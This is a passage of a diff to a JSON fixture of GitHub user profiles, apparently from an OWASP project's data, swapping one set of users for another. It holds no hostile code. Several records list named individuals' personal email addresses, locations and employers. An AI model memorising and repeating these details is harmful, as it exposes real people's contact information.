"2015-07-23T05:53:30Z", - "updated_at": "2024-09-10T05:41:22Z", - "node_id": "MDQ6VXNlcjEzNDYyODE4", - "bio": "Full Stack Application Security Engineer | Penetration Tester | Hunter of Bugs | Automation/SDET", - "is_hireable": true, + "following_count": 56, + "followers_count": 266, + "public_gists_count": 27, + "public_repositories_count": 157, + "created_at": "2010-12-01T09:32:30Z", + "updated_at": "2024-08-09T11:39:06Z", + "node_id": "MDQ6VXNlcjUwNDY4Nw==", + "bio": "All things @Flarum.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2249, + "pk": 7583, "fields": { - "nest_created_at": "2024-09-12T01:12:53.072Z", - "nest_updated_at": "2024-09-12T01:12:53.072Z", + "nest_created_at": "2024-09-22T09:34:29.016Z", + "nest_updated_at": "2024-09-22T19:33:31.354Z", + "name": "Danny Gershman", + "login": "dgershman", + "email": "danny@radiusmethod.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1850811?v=4", + "company": "@radiusmethod", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 50, + "followers_count": 37, + "public_gists_count": 74, + "public_repositories_count": 91, + "created_at": "2012-06-14T15:37:35Z", + "updated_at": "2024-09-10T18:10:35Z", + "node_id": "MDQ6VXNlcjE4NTA4MTE=", + "bio": "Over 27 yrs experience developing software. Worked with various technologies in Cybersecurity, VOIP, Content Delivery and Business Process Automation.", + "is_hireable": true, + "twitter_username": "dannygnc" + } +}, +{ + "model": "github.user", + "pk": 7584, + "fields": { + "nest_created_at": "2024-09-22T09:34:29.329Z", + "nest_updated_at": "2024-09-22T19:33:31.681Z", "name": "", - "login": "Nimehalaa155", + "login": "DannyHg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121023637?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18345110?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-12-19T09:59:15Z", - "updated_at": "2023-11-29T11:01:09Z", - "node_id": "U_kgDOBzaslQ", + "public_repositories_count": 2, + "created_at": "2016-04-08T08:14:20Z", + "updated_at": "2023-08-15T11:08:32Z", + "node_id": "MDQ6VXNlcjE4MzQ1MTEw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416478,49 +675527,49 @@ }, { "model": "github.user", - "pk": 2250, + "pk": 7585, "fields": { - "nest_created_at": "2024-09-12T01:12:55.955Z", - "nest_updated_at": "2024-09-12T01:12:55.955Z", - "name": "Carlos E. Peña", - "login": "cpena002", + "nest_created_at": "2024-09-22T09:34:29.636Z", + "nest_updated_at": "2024-09-22T19:33:31.997Z", + "name": "Darío Hereñú", + "login": "kant", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22306833?v=4", - "company": "@flexion ", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32717?v=4", + "company": "", + "location": "Planet Earth...", "collaborators_count": 0, - "following_count": 8, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-09-19T21:43:28Z", - "updated_at": "2024-05-07T23:52:55Z", - "node_id": "MDQ6VXNlcjIyMzA2ODMz", - "bio": "Getting better one console.log at a time. ", + "following_count": 7, + "followers_count": 319, + "public_gists_count": 12, + "public_repositories_count": 3969, + "created_at": "2008-11-05T02:06:00Z", + "updated_at": "2024-09-22T17:29:21Z", + "node_id": "MDQ6VXNlcjMyNzE3", + "bio": "oxygen addicted, paradox collector", "is_hireable": false, - "twitter_username": "" + "twitter_username": "kant" } }, { "model": "github.user", - "pk": 2251, + "pk": 7586, "fields": { - "nest_created_at": "2024-09-12T01:12:57.184Z", - "nest_updated_at": "2024-09-12T01:19:56.171Z", - "name": "Matt Tesauro", - "login": "mtesauro", + "nest_created_at": "2024-09-22T09:34:29.957Z", + "nest_updated_at": "2024-09-22T19:33:32.317Z", + "name": "Davide Beatrici", + "login": "davidebeatrici", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3422419?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5897523?v=4", "company": "", - "location": "", + "location": "Italy", "collaborators_count": 0, - "following_count": 0, - "followers_count": 82, + "following_count": 10, + "followers_count": 113, "public_gists_count": 2, - "public_repositories_count": 41, - "created_at": "2013-01-30T00:36:40Z", - "updated_at": "2024-07-09T01:56:52Z", - "node_id": "MDQ6VXNlcjM0MjI0MTk=", + "public_repositories_count": 62, + "created_at": "2013-11-09T19:04:52Z", + "updated_at": "2024-08-30T22:21:29Z", + "node_id": "MDQ6VXNlcjU4OTc1MjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416528,149 +675577,149 @@ }, { "model": "github.user", - "pk": 2252, + "pk": 7587, "fields": { - "nest_created_at": "2024-09-12T01:13:00.502Z", - "nest_updated_at": "2024-09-12T01:13:00.502Z", - "name": "", - "login": "nightshiba", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49189362?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:30.269Z", + "nest_updated_at": "2024-09-22T19:33:32.635Z", + "name": "Deepak Ahire", + "login": "adeepak7", + "email": "ahiredeepak20@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20664587?v=4", + "company": "@UCSD", + "location": "San Diego, United States of America", "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, + "following_count": 88, + "followers_count": 65, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2019-04-02T09:05:58Z", - "updated_at": "2024-09-05T16:46:16Z", - "node_id": "MDQ6VXNlcjQ5MTg5MzYy", - "bio": "#bepis", - "is_hireable": false, - "twitter_username": "nightshiba" + "public_repositories_count": 33, + "created_at": "2016-07-26T14:25:17Z", + "updated_at": "2024-09-21T07:05:00Z", + "node_id": "MDQ6VXNlcjIwNjY0NTg3", + "bio": "Graduate student @UCSD.\r\n\r\nEx Software Development Engineer at @Microsoft India R&D.\r\n\r\nI love algorithms.\r\n\r\n\r\n", + "is_hireable": true, + "twitter_username": "adeepak207" } }, { "model": "github.user", - "pk": 2253, + "pk": 7588, "fields": { - "nest_created_at": "2024-09-12T01:13:01.725Z", - "nest_updated_at": "2024-09-12T01:13:01.725Z", - "name": "Joep", - "login": "joeppeeters", + "nest_created_at": "2024-09-22T09:34:30.590Z", + "nest_updated_at": "2024-09-22T19:33:32.947Z", + "name": "Denys Sedchenko", + "login": "x1unix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3350917?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9203548?v=4", "company": "", - "location": "", + "location": "NYC", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2013-01-23T09:12:17Z", - "updated_at": "2024-09-04T10:23:39Z", - "node_id": "MDQ6VXNlcjMzNTA5MTc=", - "bio": "", + "following_count": 25, + "followers_count": 131, + "public_gists_count": 112, + "public_repositories_count": 87, + "created_at": "2014-10-13T20:59:12Z", + "updated_at": "2024-09-14T17:34:24Z", + "node_id": "MDQ6VXNlcjkyMDM1NDg=", + "bio": "Carbon-based lifeform", "is_hireable": false, - "twitter_username": "" + "twitter_username": "x1unix" } }, { "model": "github.user", - "pk": 2254, + "pk": 7589, "fields": { - "nest_created_at": "2024-09-12T01:13:03.379Z", - "nest_updated_at": "2024-09-12T01:13:03.380Z", - "name": "Samuel Ibáñez Gómez", - "login": "ibanezgomez", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8628648?v=4", + "nest_created_at": "2024-09-22T09:34:30.911Z", + "nest_updated_at": "2024-09-22T19:33:33.257Z", + "name": "Dmitry Sumin", + "login": "dsumin", + "email": "dmitry.sumin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2417937?v=4", "company": "", - "location": "Spain", + "location": "Tallinn, Estonia", "collaborators_count": 0, - "following_count": 11, - "followers_count": 13, - "public_gists_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 3, "public_repositories_count": 4, - "created_at": "2014-09-02T13:48:35Z", - "updated_at": "2024-07-18T09:08:54Z", - "node_id": "MDQ6VXNlcjg2Mjg2NDg=", - "bio": "IT Engineer & VW Enthusiast", - "is_hireable": true, - "twitter_username": "" + "created_at": "2012-09-25T06:37:19Z", + "updated_at": "2024-06-14T05:19:50Z", + "node_id": "MDQ6VXNlcjI0MTc5Mzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "dsumin" } }, { "model": "github.user", - "pk": 2255, + "pk": 7590, "fields": { - "nest_created_at": "2024-09-12T01:13:06.545Z", - "nest_updated_at": "2024-09-12T01:13:06.545Z", - "name": "Daniel Kemper", - "login": "devsecopspaylouser", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103608074?v=4", - "company": "Paylocity", - "location": "", + "nest_created_at": "2024-09-22T09:34:31.225Z", + "nest_updated_at": "2024-09-22T19:33:33.564Z", + "name": "Duncan Leo", + "login": "duncanleo", + "email": "hello@duncanleo.me", + "avatar_url": "https://avatars.githubusercontent.com/u/7417870?v=4", + "company": "@undertideco @taskade", + "location": "Singapore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-04-13T21:28:08Z", - "updated_at": "2024-08-01T16:49:27Z", - "node_id": "U_kgDOBizvCg", - "bio": "Principal Development Security Operations Engineer.", + "following_count": 18, + "followers_count": 60, + "public_gists_count": 2, + "public_repositories_count": 55, + "created_at": "2014-04-27T03:37:18Z", + "updated_at": "2024-09-22T11:36:34Z", + "node_id": "MDQ6VXNlcjc0MTc4NzA=", + "bio": "Software Engineer @taskade, Founder @undertideco", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2256, + "pk": 7591, "fields": { - "nest_created_at": "2024-09-12T01:13:07.827Z", - "nest_updated_at": "2024-09-12T01:13:07.827Z", - "name": "Asad Hussain", - "login": "Engr-Asad-Hussain", - "email": "asad.h1998@yahoo.com", - "avatar_url": "https://avatars.githubusercontent.com/u/57555839?v=4", - "company": "Working at Auxin Security", - "location": "Pakistan, Karachi", + "nest_created_at": "2024-09-22T09:34:31.549Z", + "nest_updated_at": "2024-09-22T19:33:33.873Z", + "name": "Dylan Schiemann", + "login": "dylans", + "email": "dylan@dojotoolkit.org", + "avatar_url": "https://avatars.githubusercontent.com/u/97291?v=4", + "company": "Living Spec", + "location": "Phoenix, Arizona", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 56, - "created_at": "2019-11-09T07:12:04Z", - "updated_at": "2024-09-06T05:07:34Z", - "node_id": "MDQ6VXNlcjU3NTU1ODM5", - "bio": "Full Stack Developer - Python/Flask - JavaScript/React", - "is_hireable": true, - "twitter_username": "" + "following_count": 18, + "followers_count": 205, + "public_gists_count": 5, + "public_repositories_count": 120, + "created_at": "2009-06-20T11:30:32Z", + "updated_at": "2024-09-09T12:36:20Z", + "node_id": "MDQ6VXNlcjk3Mjkx", + "bio": "CEO at Living Spec, Co-creator of Dojo, Co-maintainer of Slate and Plate, Former CEO at SitePen", + "is_hireable": false, + "twitter_username": "dylans" } }, { "model": "github.user", - "pk": 2257, + "pk": 7592, "fields": { - "nest_created_at": "2024-09-12T01:13:08.648Z", - "nest_updated_at": "2024-09-12T01:13:22.473Z", - "name": "Rustik", - "login": "sakyra01", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57565730?v=4", + "nest_created_at": "2024-09-22T09:34:31.868Z", + "nest_updated_at": "2024-09-22T19:33:34.203Z", + "name": "Alex Crichton", + "login": "alexcrichton", + "email": "alex@alexcrichton.com", + "avatar_url": "https://avatars.githubusercontent.com/u/64996?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 46, - "created_at": "2019-11-09T14:32:49Z", - "updated_at": "2024-08-30T12:11:25Z", - "node_id": "MDQ6VXNlcjU3NTY1NzMw", + "following_count": 0, + "followers_count": 5100, + "public_gists_count": 1628, + "public_repositories_count": 454, + "created_at": "2009-03-19T19:31:50Z", + "updated_at": "2024-09-09T16:15:44Z", + "node_id": "MDQ6VXNlcjY0OTk2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416678,74 +675727,74 @@ }, { "model": "github.user", - "pk": 2258, + "pk": 7593, "fields": { - "nest_created_at": "2024-09-12T01:13:09.510Z", - "nest_updated_at": "2024-09-12T01:13:15.945Z", - "name": "Karsten Siemer", - "login": "KarstenSiemer", - "email": "karsten.siemer@aetherize.com", - "avatar_url": "https://avatars.githubusercontent.com/u/40307978?v=4", - "company": "Aetherize", - "location": "Hamburg", + "nest_created_at": "2024-09-22T09:34:32.176Z", + "nest_updated_at": "2024-09-22T19:33:34.549Z", + "name": "Ana Paula Gomes", + "login": "anapaulagomes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1899950?v=4", + "company": "@robert-koch-institut", + "location": "Berlin", "collaborators_count": 0, - "following_count": 5, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2018-06-15T23:35:10Z", - "updated_at": "2024-01-31T08:29:11Z", - "node_id": "MDQ6VXNlcjQwMzA3OTc4", - "bio": "Freelance DevOps Engineer", + "following_count": 305, + "followers_count": 692, + "public_gists_count": 46, + "public_repositories_count": 62, + "created_at": "2012-06-27T19:26:47Z", + "updated_at": "2024-09-06T10:39:05Z", + "node_id": "MDQ6VXNlcjE4OTk5NTA=", + "bio": "PhD student at the @robert-koch-institut (Centre for Artificial Intelligence in Public Health Research), master of none. Latina.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2259, + "pk": 7594, "fields": { - "nest_created_at": "2024-09-12T01:13:10.852Z", - "nest_updated_at": "2024-09-12T01:13:10.852Z", - "name": "", - "login": "HelpMe-AC", + "nest_created_at": "2024-09-22T09:34:32.484Z", + "nest_updated_at": "2024-09-22T19:33:34.889Z", + "name": "Anders Ljusberg", + "login": "andlju", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/136791298?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/328707?v=4", + "company": "Aptitud", + "location": "Stockholm, Sweden", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-06-16T07:19:55Z", - "updated_at": "2023-06-16T07:19:55Z", - "node_id": "U_kgDOCCdFAg", + "following_count": 1, + "followers_count": 22, + "public_gists_count": 12, + "public_repositories_count": 34, + "created_at": "2010-07-11T08:51:59Z", + "updated_at": "2024-09-20T08:00:56Z", + "node_id": "MDQ6VXNlcjMyODcwNw==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "CodingInsomnia" } }, { "model": "github.user", - "pk": 2260, + "pk": 7595, "fields": { - "nest_created_at": "2024-09-12T01:13:12.204Z", - "nest_updated_at": "2024-09-12T01:13:12.204Z", - "name": "Le Duc Lischetzke", - "login": "lischetzke", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6329950?v=4", + "nest_created_at": "2024-09-22T09:34:32.810Z", + "nest_updated_at": "2024-09-22T19:33:35.212Z", + "name": "Andrew Ying", + "login": "andrewying", + "email": "hi@andrewying.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1071082?v=4", "company": "", - "location": "", + "location": "Cambridge, United Kingdom", "collaborators_count": 0, - "following_count": 4, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2014-01-06T12:56:38Z", - "updated_at": "2024-08-13T22:27:50Z", - "node_id": "MDQ6VXNlcjYzMjk5NTA=", + "following_count": 1, + "followers_count": 7, + "public_gists_count": 3, + "public_repositories_count": 14, + "created_at": "2011-09-22T13:48:03Z", + "updated_at": "2024-09-17T11:21:01Z", + "node_id": "MDQ6VXNlcjEwNzEwODI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416753,124 +675802,124 @@ }, { "model": "github.user", - "pk": 2261, + "pk": 7596, "fields": { - "nest_created_at": "2024-09-12T01:13:18.730Z", - "nest_updated_at": "2024-09-12T01:13:18.730Z", - "name": "", - "login": "breckwoldt", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73230574?v=4", + "nest_created_at": "2024-09-22T09:34:33.134Z", + "nest_updated_at": "2024-09-22T19:33:35.530Z", + "name": "Jewel Andraia Darger-Sacher", + "login": "jewel-andraia", + "email": "jewel@dargersacher.com", + "avatar_url": "https://avatars.githubusercontent.com/u/455632?v=4", "company": "", - "location": "", + "location": "San Francisco, CA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-10-21T11:27:16Z", - "updated_at": "2022-04-05T10:14:15Z", - "node_id": "MDQ6VXNlcjczMjMwNTc0", - "bio": "", + "following_count": 12, + "followers_count": 95, + "public_gists_count": 32, + "public_repositories_count": 63, + "created_at": "2010-10-27T01:31:31Z", + "updated_at": "2024-09-03T22:05:01Z", + "node_id": "MDQ6VXNlcjQ1NTYzMg==", + "bio": "hoopla!", "is_hireable": false, - "twitter_username": "" + "twitter_username": "aladyjewel" } }, { "model": "github.user", - "pk": 2262, + "pk": 7597, "fields": { - "nest_created_at": "2024-09-12T01:13:19.578Z", - "nest_updated_at": "2024-09-12T01:13:19.578Z", - "name": "", - "login": "ankur-aggarwal0403", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/112920750?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:33.456Z", + "nest_updated_at": "2024-09-22T19:33:35.840Z", + "name": "Anton Babenko", + "login": "antonbabenko", + "email": "anton@antonbabenko.com", + "avatar_url": "https://avatars.githubusercontent.com/u/393243?v=4", + "company": "weekly.tf + modules.tf + serverless.tf + compliance.tf", + "location": "Oslo, Norway", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-09-06T03:56:41Z", - "updated_at": "2023-07-24T20:43:14Z", - "node_id": "U_kgDOBrsIrg", - "bio": "", + "following_count": 199, + "followers_count": 4764, + "public_gists_count": 44, + "public_repositories_count": 34, + "created_at": "2010-09-09T12:20:36Z", + "updated_at": "2024-09-19T18:41:57Z", + "node_id": "MDQ6VXNlcjM5MzI0Mw==", + "bio": "AWS Community Hero / Terraform Influencer 🇺🇦🇳🇴 - 👀 🔴 \"Your Weekly Dose of Terraform\" - http://bit.ly/terraform-youtube", "is_hireable": false, - "twitter_username": "" + "twitter_username": "antonbabenko" } }, { "model": "github.user", - "pk": 2263, + "pk": 7598, "fields": { - "nest_created_at": "2024-09-12T01:13:20.386Z", - "nest_updated_at": "2024-09-12T01:13:20.386Z", - "name": "", - "login": "jdfresser", + "nest_created_at": "2024-09-22T09:34:33.791Z", + "nest_updated_at": "2024-09-22T19:33:36.156Z", + "name": "Antonio Pagano", + "login": "paganotoni", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60644781?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/645522?v=4", + "company": "Wawandco", + "location": "Barranquilla / Colombia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-02-04T08:19:42Z", - "updated_at": "2024-06-26T16:11:08Z", - "node_id": "MDQ6VXNlcjYwNjQ0Nzgx", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 53, + "followers_count": 108, + "public_gists_count": 44, + "public_repositories_count": 110, + "created_at": "2011-03-01T20:02:26Z", + "updated_at": "2024-08-13T12:51:09Z", + "node_id": "MDQ6VXNlcjY0NTUyMg==", + "bio": "Antonio Pagano is a seasoned software developer with an entrepreneur mind, founded @wawandco, and has more than 15 years building production scalable systems", + "is_hireable": true, + "twitter_username": "paganotoni" } }, { "model": "github.user", - "pk": 2264, + "pk": 7599, "fields": { - "nest_created_at": "2024-09-12T01:13:21.202Z", - "nest_updated_at": "2024-09-12T01:13:21.202Z", - "name": "Kirill Bludilin", - "login": "kir-b", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31217006?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:34.131Z", + "nest_updated_at": "2024-09-22T19:33:36.470Z", + "name": "Artem Sidorenko", + "login": "artem-sidorenko", + "email": "artem@posteo.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1645670?v=4", + "company": "Deutsche Telekom AG", + "location": "Bonn, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-08-21T16:05:49Z", - "updated_at": "2024-09-04T20:51:52Z", - "node_id": "MDQ6VXNlcjMxMjE3MDA2", + "following_count": 8, + "followers_count": 57, + "public_gists_count": 6, + "public_repositories_count": 13, + "created_at": "2012-04-15T16:56:08Z", + "updated_at": "2024-09-19T07:46:17Z", + "node_id": "MDQ6VXNlcjE2NDU2NzA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2265, + "pk": 7600, "fields": { - "nest_created_at": "2024-09-12T01:13:23.308Z", - "nest_updated_at": "2024-09-12T01:13:23.308Z", + "nest_created_at": "2024-09-22T09:34:34.457Z", + "nest_updated_at": "2024-09-22T19:33:36.796Z", "name": "", - "login": "scott86", + "login": "Artuto", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5334178?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9273973?v=4", "company": "", - "location": "", + "location": "Mexico", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2013-08-28T23:21:57Z", - "updated_at": "2024-08-05T17:32:40Z", - "node_id": "MDQ6VXNlcjUzMzQxNzg=", + "following_count": 8, + "followers_count": 31, + "public_gists_count": 17, + "public_repositories_count": 23, + "created_at": "2014-10-16T20:58:06Z", + "updated_at": "2024-08-28T11:33:18Z", + "node_id": "MDQ6VXNlcjkyNzM5NzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -416878,124 +675927,124 @@ }, { "model": "github.user", - "pk": 2266, + "pk": 7601, "fields": { - "nest_created_at": "2024-09-12T01:13:24.586Z", - "nest_updated_at": "2024-09-12T01:13:24.586Z", - "name": "", - "login": "ftotheasec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/142237229?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:34:34.764Z", + "nest_updated_at": "2024-09-22T19:33:37.114Z", + "name": "Atthaboon Sanurt (P'Art)", + "login": "atthaboon", + "email": "atthaboon.s@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/855604?v=4", + "company": "QA Hive", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-14T14:06:09Z", - "updated_at": "2023-08-14T14:06:09Z", - "node_id": "U_kgDOCHpeLQ", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 6, + "followers_count": 14, + "public_gists_count": 20, + "public_repositories_count": 32, + "created_at": "2011-06-17T04:05:43Z", + "updated_at": "2024-08-28T11:22:05Z", + "node_id": "MDQ6VXNlcjg1NTYwNA==", + "bio": "I am Software Development Engineer with more than 8 years of experience in developing API services and framework. \r\nInitiate AUTOBOT system test framework.", + "is_hireable": true, + "twitter_username": "QAHive" } }, { "model": "github.user", - "pk": 2267, + "pk": 7602, "fields": { - "nest_created_at": "2024-09-12T01:13:26.697Z", - "nest_updated_at": "2024-09-12T01:13:26.697Z", - "name": "Smaran Chand", - "login": "smaranchand", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36672015?v=4", + "nest_created_at": "2024-09-22T09:34:35.078Z", + "nest_updated_at": "2024-09-22T19:33:37.424Z", + "name": "Ben Carlsson", + "login": "glacials", + "email": "ben@twos.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/438911?v=4", "company": "", - "location": "Kathmandu, Nepal", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 19, - "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2018-02-20T16:25:29Z", - "updated_at": "2024-08-14T17:22:45Z", - "node_id": "MDQ6VXNlcjM2NjcyMDE1", - "bio": "I act like a hacker, but I am not. I explore about application and cloud security.", - "is_hireable": true, - "twitter_username": "smaranchand" + "following_count": 103, + "followers_count": 118, + "public_gists_count": 6, + "public_repositories_count": 72, + "created_at": "2010-10-14T05:39:37Z", + "updated_at": "2024-09-11T16:30:27Z", + "node_id": "MDQ6VXNlcjQzODkxMQ==", + "bio": "can't talk, five side projects deep.\r\n\r\nprev @twitchtv, @llnl", + "is_hireable": false, + "twitter_username": "glcls" } }, { "model": "github.user", - "pk": 2268, + "pk": 7603, "fields": { - "nest_created_at": "2024-09-12T01:13:27.948Z", - "nest_updated_at": "2024-09-12T01:13:29.250Z", - "name": "", - "login": "tomaszn", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/981572?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:35.390Z", + "nest_updated_at": "2024-09-22T19:33:37.738Z", + "name": "Benjamin Lupton", + "login": "balupton", + "email": "b@lupton.cc", + "avatar_url": "https://avatars.githubusercontent.com/u/61148?v=4", + "company": "@Bevry", + "location": "Perth, Australia", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 50, - "created_at": "2011-08-15T17:56:19Z", - "updated_at": "2024-09-03T11:22:23Z", - "node_id": "MDQ6VXNlcjk4MTU3Mg==", - "bio": "", + "following_count": 459, + "followers_count": 1277, + "public_gists_count": 192, + "public_repositories_count": 251, + "created_at": "2009-03-07T21:43:06Z", + "updated_at": "2024-09-18T06:48:01Z", + "node_id": "MDQ6VXNlcjYxMTQ4", + "bio": "Accelerating collaborative wisdom.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "balupton" } }, { "model": "github.user", - "pk": 2269, + "pk": 7604, "fields": { - "nest_created_at": "2024-09-12T01:13:30.084Z", - "nest_updated_at": "2024-09-12T01:13:30.084Z", - "name": "泰山", - "login": "cnsino", + "nest_created_at": "2024-09-22T09:34:35.697Z", + "nest_updated_at": "2024-09-22T19:33:38.044Z", + "name": "Benni Mack", + "login": "bmack", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121778348?v=4", - "company": "Ciumhoa", + "avatar_url": "https://avatars.githubusercontent.com/u/165630?v=4", + "company": "@b13 ", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2023-01-02T02:30:09Z", - "updated_at": "2024-09-03T11:59:37Z", - "node_id": "U_kgDOB0IwrA", - "bio": "", + "following_count": 3, + "followers_count": 131, + "public_gists_count": 4, + "public_repositories_count": 65, + "created_at": "2009-12-10T15:25:50Z", + "updated_at": "2024-04-25T09:41:13Z", + "node_id": "MDQ6VXNlcjE2NTYzMA==", + "bio": " Project Lead @TYPO3 CMS. CTO @b13", "is_hireable": false, - "twitter_username": "" + "twitter_username": "bennimack" } }, { "model": "github.user", - "pk": 2270, + "pk": 7605, "fields": { - "nest_created_at": "2024-09-12T01:13:31.381Z", - "nest_updated_at": "2024-09-12T01:13:31.381Z", - "name": "", - "login": "drclark-dev", + "nest_created_at": "2024-09-22T09:34:36.009Z", + "nest_updated_at": "2024-09-22T19:33:38.350Z", + "name": "Bjoern Poetzschke", + "login": "bpoetzschke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/144707252?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14922158?v=4", "company": "", - "location": "", + "location": "Boston", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-09-11T14:59:13Z", - "updated_at": "2024-01-31T19:26:00Z", - "node_id": "U_kgDOCKAOtA", + "public_repositories_count": 13, + "created_at": "2015-10-01T09:15:41Z", + "updated_at": "2024-08-21T20:49:43Z", + "node_id": "MDQ6VXNlcjE0OTIyMTU4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417003,24 +676052,24 @@ }, { "model": "github.user", - "pk": 2271, + "pk": 7606, "fields": { - "nest_created_at": "2024-09-12T01:13:32.619Z", - "nest_updated_at": "2024-09-12T01:13:32.619Z", - "name": "", - "login": "ismaelcjr", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/140366397?v=4", + "nest_created_at": "2024-09-22T09:34:36.316Z", + "nest_updated_at": "2024-09-22T19:33:38.662Z", + "name": "Brock Allen", + "login": "brockallen", + "email": "brockallen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/649492?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-07-24T03:42:46Z", - "updated_at": "2023-09-19T05:52:38Z", - "node_id": "U_kgDOCF3SPQ", + "following_count": 2, + "followers_count": 1157, + "public_gists_count": 7, + "public_repositories_count": 27, + "created_at": "2011-03-03T18:14:18Z", + "updated_at": "2024-06-28T11:28:25Z", + "node_id": "MDQ6VXNlcjY0OTQ5Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417028,99 +676077,99 @@ }, { "model": "github.user", - "pk": 2272, + "pk": 7607, "fields": { - "nest_created_at": "2024-09-12T01:13:33.905Z", - "nest_updated_at": "2024-09-12T01:13:33.905Z", - "name": "Sultan Baharuddin", - "login": "Roooodie", + "nest_created_at": 